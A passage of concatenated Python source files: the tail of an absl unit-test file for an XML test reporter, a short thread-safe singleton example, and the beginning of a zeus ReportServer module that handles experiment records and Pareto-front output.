'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def get_sample_error(self):
try:
int('a')
except ValueError:
error_values = sys.exc_info()
return error_values
def get_sample_failure(self):
try:
raise AssertionError('e')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_newline_message_sample_failure(self):
try:
raise AssertionError('new\nline')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_unicode_sample_failure(self):
try:
raise AssertionError(u'\xe9')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_terminal_escape_sample_failure(self):
try:
raise AssertionError('\x1b')
except AssertionError:
error_values = sys.exc_info()
return error_values
def test_with_failing_test(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
1,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
FAILURE_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_failing_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_failure())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
1,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
r'failing_test \[msg\]',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
FAILURE_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_error_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.error_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_error())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
r'error_test \[msg\]',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
ERROR_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_fail_and_error_test(self):
"""Tests a failure and subsequent error within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
# This could happen in tearDown
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
1, # Only the failure is tallied (because it was first).
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
# Messages from failure and error should be concatenated in order.
'message':
FAILURE_MESSAGE + ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_error_and_fail_test(self):
"""Tests an error and subsequent failure within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_sample_error())
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1, # Only the error is tallied (because it was first).
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
# Messages from error and failure should be concatenated in order.
'message':
ERROR_MESSAGE + FAILURE_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_newline_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_newline_message_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
NEWLINE_ERROR_MESSAGE
} + '\n'
self._assert_match(expected_re, xml)
def test_with_unicode_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_unicode_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
UNICODE_ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_terminal_escape_error(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_terminal_escape_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
self._assert_valid_xml(self.xml_stream.getvalue())
def test_with_expected_failure_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
error_values = ''
try:
raise RuntimeError('Test expectedFailure')
except RuntimeError:
error_values = sys.exc_info()
test = MockTest('__main__.MockTest.expected_failing_test')
result.startTestRun()
result.startTest(test)
result.addExpectedFailure(test, error_values)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'expected_failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(re.compile(expected_re, re.DOTALL),
self.xml_stream.getvalue())
def test_with_unexpected_success_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.unexpectedly_passing_test')
result.startTestRun()
result.startTest(test)
result.addUnexpectedSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'unexpectedly_passing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
UNEXPECTED_SUCCESS_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_skipped_test(self):
start_time = 100
end_time = 100
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.skipped_test_with_reason')
result.startTestRun()
result.startTest(test)
result.addSkip(test, 'b"r')
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'skipped_test_with_reason',
'classname':
'__main__.MockTest',
'status':
'notrun',
'result':
'suppressed',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_suite_time(self):
start_time1 = 100
end_time1 = 200
start_time2 = 400
end_time2 = 700
name = '__main__.MockTest.failing_test'
result = self._make_result((start_time1, start_time1, end_time1,
start_time2, end_time2, end_time2))
test = MockTest('%s1' % name)
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
test = MockTest('%s2' % name)
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = max(end_time1, end_time2) - min(start_time1, start_time2)
timestamp = datetime.datetime.utcfromtimestamp(start_time1).isoformat()
expected_prefix = """<?xml version="1.0"?>
<testsuites name="" tests="2" failures="0" errors="0" time="%.1f" timestamp="%s">
<testsuite name="MockTest" tests="2" failures="0" errors="0" time="%.1f" timestamp="%s">
""" % (run_time, timestamp, run_time, timestamp)
xml_output = self.xml_stream.getvalue()
self.assertTrue(
xml_output.startswith(expected_prefix),
'%s not found in %s' % (expected_prefix, xml_output))
def test_with_no_suite_name(self):
start_time = 1000
end_time = 1200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.bad_name')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'bad_name',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_unnamed_parameterized_testcase(self):
"""Test unnamed parameterized test cases.
Unnamed parameterized test cases might have non-alphanumeric characters in
their test method names. This test ensures xml_reporter handles them
correctly.
"""
class ParameterizedTest(parameterized.TestCase):
@parameterized.parameters(('a (b.c)',))
def test_prefix(self, case):
self.assertTrue(case.startswith('a'))
start_time = 1000
end_time = 1200
result = self._make_result((start_time, start_time, end_time, end_time))
test = ParameterizedTest(methodName='test_prefix0')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
classname = xml_reporter._escape_xml_attr(
unittest.util.strclass(test.__class__))
expected_re = OUTPUT_STRING % {
'suite_name':
'ParameterizedTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
re.escape('test_prefix('a (b.c)')'),
'classname':
classname,
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def teststop_test_without_pending_test(self):
end_time = 1200
result = self._make_result((end_time,))
test = MockTest('__main__.MockTest.bad_name')
result.stopTest(test)
result.stopTestRun()
# Just verify that this doesn't crash
def test_text_and_xmltest_runner(self):
runner = xml_reporter.TextAndXMLTestRunner(self.xml_stream, self.stream,
'foo', 1)
result1 = runner._makeResult()
result2 = xml_reporter._TextAndXMLTestResult(None, None, None, 0, None)
self.failUnless(type(result1) is type(result2))
def test_timing_with_time_stub(self):
"""Make sure that timing is correct even if time.time is stubbed out."""
try:
saved_time = time.time
time.time = lambda: -1
reporter = xml_reporter._TextAndXMLTestResult(self.xml_stream,
self.stream,
'foo', 0)
test = MockTest('bar')
reporter.startTest(test)
self.failIf(reporter.start_time == -1)
finally:
time.time = saved_time
def test_concurrent_add_and_delete_pending_test_case_result(self):
"""Make sure adding/deleting pending test case results are thread safe."""
result = xml_reporter._TextAndXMLTestResult(None, self.stream, None, 0,
None)
def add_and_delete_pending_test_case_result(test_name):
test = MockTest(test_name)
result.addSuccess(test)
result.delete_pending_test_case_result(test)
for i in range(50):
add_and_delete_pending_test_case_result('add_and_delete_test%s' % i)
self.assertEqual(result.pending_test_case_results, {})
def test_concurrent_test_runs(self):
"""Make sure concurrent test runs do not race each other."""
num_passing_tests = 20
num_failing_tests = 20
num_error_tests = 20
total_num_tests = num_passing_tests + num_failing_tests + num_error_tests
times = [0] + [i for i in range(2 * total_num_tests)
] + [2 * total_num_tests - 1]
result = self._make_result(times)
threads = []
names = []
result.startTestRun()
for i in range(num_passing_tests):
name = 'passing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
# xml_reporter uses id(test) as the test identifier.
# In a real testing scenario, all the test instances are created before
# running them. So all ids will be unique.
# We must do the same here: create test instance beforehand.
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_passing_test, args=(test, result)))
for i in range(num_failing_tests):
name = 'failing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_failing_test, args=(test, result)))
for i in range(num_error_tests):
name = 'error_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_error_test, args=(test, result)))
for t in threads:
t.start()
for t in threads:
t.join()
result.stopTestRun()
result.printErrors()
tests_not_in_xml = []
for tn in names:
if tn not in self.xml_stream.getvalue():
tests_not_in_xml.append(tn)
msg = ('Expected xml_stream to contain all test %s results, but %s tests '
'are missing. List of missing tests: %s' % (
total_num_tests, len(tests_not_in_xml), tests_not_in_xml))
self.assertEqual([], tests_not_in_xml, msg)
def test_add_failure_during_stop_test(self):
"""Tests an addFailure() call from within a stopTest() call stack."""
result = self._make_result((0, 2))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
# Replace parent stopTest method from unittest3_backport.TextTestResult with
# a version that calls self.addFailure().
with mock.patch.object(
unittest3_backport.TextTestResult,
'stopTest',
side_effect=lambda t: result.addFailure(t, self.get_sample_failure())):
# Run stopTest in a separate thread since we are looking to verify that
# it does not deadlock, and would otherwise prevent the test from
# completing.
stop_test_thread = threading.Thread(target=result.stopTest, args=(test,))
stop_test_thread.daemon = True
stop_test_thread.start()
stop_test_thread.join(10.0)
self.assertFalse(stop_test_thread.is_alive(),
'result.stopTest(test) call failed to complete')
class XMLTest(absltest.TestCase):
def test_escape_xml(self):
self.assertEqual(xml_reporter._escape_xml_attr('"Hi" <\'>\t\r\n'),
'"Hi" <'>	
')
class XmlReporterFixtureTest(absltest.TestCase):
def _get_helper(self):
binary_name = 'absl/testing/tests/xml_reporter_helper_test'
return _bazelize_command.get_executable_path(binary_name)
def _run_test_and_get_xml(self, flag):
"""Runs xml_reporter_helper_test and returns an Element instance.
Runs xml_reporter_helper_test in a new process so that it can
exercise the entire test infrastructure, and easily test issues in
the test fixture.
Args:
flag: flag to pass to xml_reporter_helper_test
Returns:
The Element instance of the XML output.
"""
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary = self._get_helper()
args = [binary, flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
finally:
os.remove(xml_fname)
return xml
def _run_test(self, flag, num_errors, num_failures, suites):
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary = self._get_helper()
args = [binary, flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
logging.info('xml output is:\n%s', ElementTree.tostring(xml))
finally:
os.remove(xml_fname)
self.assertEqual(int(xml.attrib['errors']), num_errors)
self.assertEqual(int(xml.attrib['failures']), num_failures)
self.assertLen(xml, len(suites))
actual_suites = sorted(
xml.findall('testsuite'), key=lambda x: x.attrib['name'])
suites = sorted(suites, key=lambda x: x['name'])
for actual_suite, expected_suite in zip(actual_suites, suites):
self.assertEqual(actual_suite.attrib['name'], expected_suite['name'])
self.assertLen(actual_suite, len(expected_suite['cases']))
actual_cases = sorted(actual_suite.findall('testcase'),
key=lambda x: x.attrib['name'])
expected_cases = sorted(expected_suite['cases'], key=lambda x: x['name'])
for actual_case, expected_case in zip(actual_cases, expected_cases):
self.assertEqual(actual_case.attrib['name'], expected_case['name'])
self.assertEqual(actual_case.attrib['classname'],
expected_case['classname'])
if 'error' in expected_case:
actual_error = actual_case.find('error')
self.assertEqual(actual_error.attrib['message'],
expected_case['error'])
if 'failure' in expected_case:
actual_failure = actual_case.find('failure')
self.assertEqual(actual_failure.attrib['message'],
expected_case['failure'])
return xml
def _test_for_error(self, flag, message):
"""Run the test and look for an Error with the specified message."""
ret, xml = self._run_test_with_subprocess(flag)
self.assertNotEqual(ret, 0)
self.assertEqual(int(xml.attrib['errors']), 1)
self.assertEqual(int(xml.attrib['failures']), 0)
for msg in xml.iter('error'):
if msg.attrib['message'] == message:
break
else:
self.fail(msg='Did not find message: "%s" in xml\n%s' % (
message, ElementTree.tostring(xml)))
def _test_for_failure(self, flag, message):
"""Run the test and look for a Failure with the specified message."""
ret, xml = self._run_test_with_subprocess(flag)
self.assertNotEqual(ret, 0)
self.assertEqual(int(xml.attrib['errors']), 0)
self.assertEqual(int(xml.attrib['failures']), 1)
for msg in xml.iter('failure'):
if msg.attrib['message'] == message:
break
else:
self.fail(msg='Did not find message: "%s"' % message)
def test_set_up_module_error(self):
self._run_test(
flag='--set_up_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': '__main__',
'cases': [{'name': 'setUpModule',
'classname': '__main__',
'error': 'setUpModule Errored!'}]}])
def test_tear_down_module_error(self):
self._run_test(
flag='--tear_down_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'}]},
{'name': '__main__',
'cases': [{'name': 'tearDownModule',
'classname': '__main__',
'error': 'tearDownModule Errored!'}]}])
def test_set_up_class_error(self):
self._run_test(
flag='--set_up_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'setUpClass',
'classname': '__main__.FailableTest',
'error': 'setUpClass Errored!'}]}])
def test_tear_down_class_error(self):
self._run_test(
flag='--tear_down_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'},
{'name': 'tearDownClass',
'classname': '__main__.FailableTest',
'error': 'tearDownClass Errored!'}]}])
def test_set_up_error(self):
self._run_test(
flag='--set_up_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Errored!'}]}])
def test_tear_down_error(self):
self._run_test(
flag='--tear_down_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Errored!'}]}])
def test_test_error(self):
self._run_test(
flag='--test_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'test Errored!'}]}])
def test_set_up_failure(self):
if six.PY2:
# A failure in setUp() produces an error (not a failure), which is
# inconsistent with the Python unittest documentation. In Python
# 2.7, the bug appears to be in unittest.TestCase.run() method.
# Although it correctly checks for a SkipTest exception, it does
# not check for a failureException.
self._run_test(
flag='--set_up_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Failed!'}]}])
else:
self._run_test(
flag='--set_up_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'setUp Failed!'}]}])
def test_tear_down_failure(self):
if six.PY2:
# See comment in test_set_up_failure().
self._run_test(
flag='--tear_down_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Failed!'}]}])
else:
self._run_test(
flag='--tear_down_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'tearDown Failed!'}]}])
def test_test_fail(self):
self._run_test(
flag='--test_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'test Failed!'}]}])
if __name__ == '__main__':
absltest.main()
|
singleton.py
|
import threading
import time
class Single:
_INSTANCE = None
_LOCK = threading.RLock()
def __init__(self, _new=False):
if not _new:
raise Exception("Don't instancing it direct")
@classmethod
def instance(cls):
if cls._INSTANCE is None:
with cls._LOCK:
if cls._INSTANCE is None:
cls._INSTANCE = cls(True)
return cls._INSTANCE
class Single2:
_S_LOCK = threading.RLock()
def __init__(self, _new=False):
if not _new:
raise Exception("Don't instancing it direct")
@classmethod
def instance(cls):
if not hasattr(cls, "_LOCK"):
with cls._S_LOCK:
if not hasattr(cls, "_LOCK"):
cls._LOCK = threading.RLock()
if not hasattr(cls, "_INSTANCE"):
with cls._LOCK:
if not hasattr(cls, "_INSTANCE"):
cls._INSTANCE = cls(True)
return cls._INSTANCE
class UseSingle(Single):
def __init__(self):
pass
class A:
pass
def _worker():
s = Single.instance()
s2 = Single2.instance()
a = A()
u = UseSingle()
print(s, "s")
print(s2, "s2")
print(a, "a")
print(u, "u")
def new_thread(n):
tp=[]
for i in range(n):
t=threading.Thread(target=_worker)
t.start()
tp.append(t)
for t in tp:
t.join()
if __name__ == "__main__":
new_thread(5)
|
report_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Report."""
import json
import logging
import os
import glob
import pickle
import time
import random
from copy import deepcopy
import numpy as np
import pandas as pd
from threading import Lock
from collections import OrderedDict
from threading import Thread
import zeus
from zeus.common import FileOps, TaskOps
from zeus.common.general import General
from .record import ReportRecord
from .report_persistence import ReportPersistence
from zeus.common import MessageServer
from zeus.common.utils import singleton
from zeus.common.pareto_front import get_pareto_index
__all__ = ["ReportServer"]
logger = logging.getLogger(__name__)
_records_lock = Lock()
_modified = False
@singleton
class ReportServer(object):
"""Report server."""
def __init__(self):
self._hist_records = OrderedDict()
self.persistence = ReportPersistence()
self._start_save_report_thread()
def run(self):
"""Run report server."""
MessageServer().register_handler("update_record", update_record)
MessageServer().register_handler("get_record", get_record)
@property
def all_records(self):
"""Get all records."""
return deepcopy(list(self._hist_records.values()))
def print_best(self, step_name):
"""Print best performance and desc."""
records = self.get_pareto_front_records(step_name)
return [dict(worker_id=record.worker_id, performance=record._performance) for record in records]
def pareto_front(self, step_name=None, nums=None, records=None):
"""Get parent front. pareto."""
if records is None:
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.performance is not None, records))
records = [record for record in records if record.rewards_compeleted]
if not records:
return None, None
try:
rewards = [record.rewards if isinstance(record.rewards, list) else [record.rewards] for record in records]
indexes = get_pareto_index(np.array(rewards)).tolist()
return [record for i, record in enumerate(records) if indexes[i]]
except Exception as ex:
logging.error('No pareto_front_records found, ex=%s', ex)
return []
def get_step_records(self, step_name=None):
"""Get step records."""
if not step_name:
step_name = General.step_name
records = self.all_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps, records))
return records
def get_record(self, step_name, worker_id):
"""Get records by step name and worker id."""
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.worker_id == worker_id, records))
return records[0]
def get_last_record(self):
"""Get last records."""
if not self.all_records:
return None
return self.all_records[-1]
def get_pareto_front_records(self, step_name=None, nums=None, selected_key=None, choice=None):
"""Get Pareto Front Records."""
if not step_name:
step_name = General.step_name
records = self.all_records
if selected_key is not None:
new_records = []
selected_key.sort()
for record in records:
record._objective_keys.sort()
if record._objective_keys == selected_key:
new_records.append(record)
records = new_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps and x.performance is not None, records))
if records:
not_finished = [x.worker_id for x in records if not x.rewards_compeleted]
records = [x for x in records if x.rewards_compeleted]
if not_finished:
logging.info(f"waiting for the workers {str(not_finished)} to finish")
if not records:
return []
pareto = self.pareto_front(step_name, nums, records=records)
if not pareto:
return []
if choice is not None:
return [random.choice(pareto)]
else:
return pareto
# def _select_one_record(self, outs, choice='normal'):
# """Select one record."""
# if outs.size == 1:
# return outs.astype(int).tolist()
# if choice == 'normal':
# data = outs[:, 1:].reshape(-1, 1).tolist()
# prob = [round(np.log(i + 1e-2), 2) for i in range(1, len(data[0]) + 1)]
# prob_temp = prob
# for idx, out in enumerate(data):
# sorted_ind = np.argsort(out)
# for idx, ind in enumerate(sorted_ind):
# prob[ind] += prob_temp[idx]
# normalization = [float(i) / float(sum(prob)) for i in prob]
# return [np.random.choice(len(data[0]), p=normalization)]
@classmethod
def restore(cls):
"""Transfer cvs_file to records."""
step_path = TaskOps().step_path
_file = os.path.join(step_path, ".reports")
if os.path.exists(_file):
with open(_file, "rb") as f:
data = pickle.load(f)
cls._hist_records = data[0]
cls.__instances__ = data[1]
def backup_output_path(self):
"""Back up output to local path."""
backup_path = TaskOps().backup_base_path
if backup_path is None:
return
FileOps.copy_folder(TaskOps().local_output_path, backup_path)
def output_pareto_front(self, step_name):
"""Save one records."""
logging.debug("All records in report, records={}".format(self.all_records))
records = deepcopy(self.get_pareto_front_records(step_name))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump pareto front records, report is emplty.")
return
self._output_records(step_name, records)
def output_step_all_records(self, step_name):
"""Output step all records."""
records = self.all_records
logging.debug("All records in report, records={}".format(self.all_records))
records = list(filter(lambda x: x.step_name == step_name, records))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump records, report is emplty.")
return
self._output_records(step_name, records)
def _output_records(self, step_name, records):
"""Dump records."""
columns = ["worker_id", "performance", "desc"]
outputs = []
for record in records:
record = record.serialize()
_record = {}
for key in columns:
_record[key] = record[key]
outputs.append(deepcopy(_record))
data = pd.DataFrame(outputs)
step_path = FileOps.join_path(TaskOps().local_output_path, step_name)
FileOps.make_dir(step_path)
_file = FileOps.join_path(step_path, "output.csv")
try:
data.to_csv(_file, index=False)
except Exception:
logging.error("Failed to save output file, file={}".format(_file))
for record in outputs:
worker_id = record["worker_id"]
worker_path = TaskOps().get_local_worker_path(step_name, worker_id)
outputs_globs = []
outputs_globs += glob.glob(FileOps.join_path(worker_path, "desc_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "hps_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "model_*"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "performance_*.json"))
for _file in outputs_globs:
if os.path.isfile(_file):
FileOps.copy_file(_file, step_path)
elif os.path.isdir(_file):
FileOps.copy_folder(_file, FileOps.join_path(step_path, os.path.basename(_file)))
def set_step_names(self, step_names):
"""Add step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.set_step_names(step_names)
def update_step_info(self, **kwargs):
"""Update step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.update_step_info(**kwargs)
def __repr__(self):
"""Override repr function."""
return str(self.all_records)
@classmethod
def load_records_from_model_folder(cls, model_folder):
"""Transfer json_file to records."""
if not model_folder or not os.path.exists(model_folder):
logging.error("Failed to load records from model folder, folder={}".format(model_folder))
return []
records = []
pattern = FileOps.join_path(model_folder, "desc_*.json")
files = glob.glob(pattern)
for _file in files:
try:
with open(_file) as f:
worker_id = _file.split(".")[-2].split("_")[-1]
weights_file = os.path.join(os.path.dirname(_file), "model_{}".format(worker_id))
if zeus.is_torch_backend():
weights_file = '{}.pth'.format(weights_file)
elif zeus.is_ms_backend():
weights_file = '{}.ckpt'.format(weights_file)
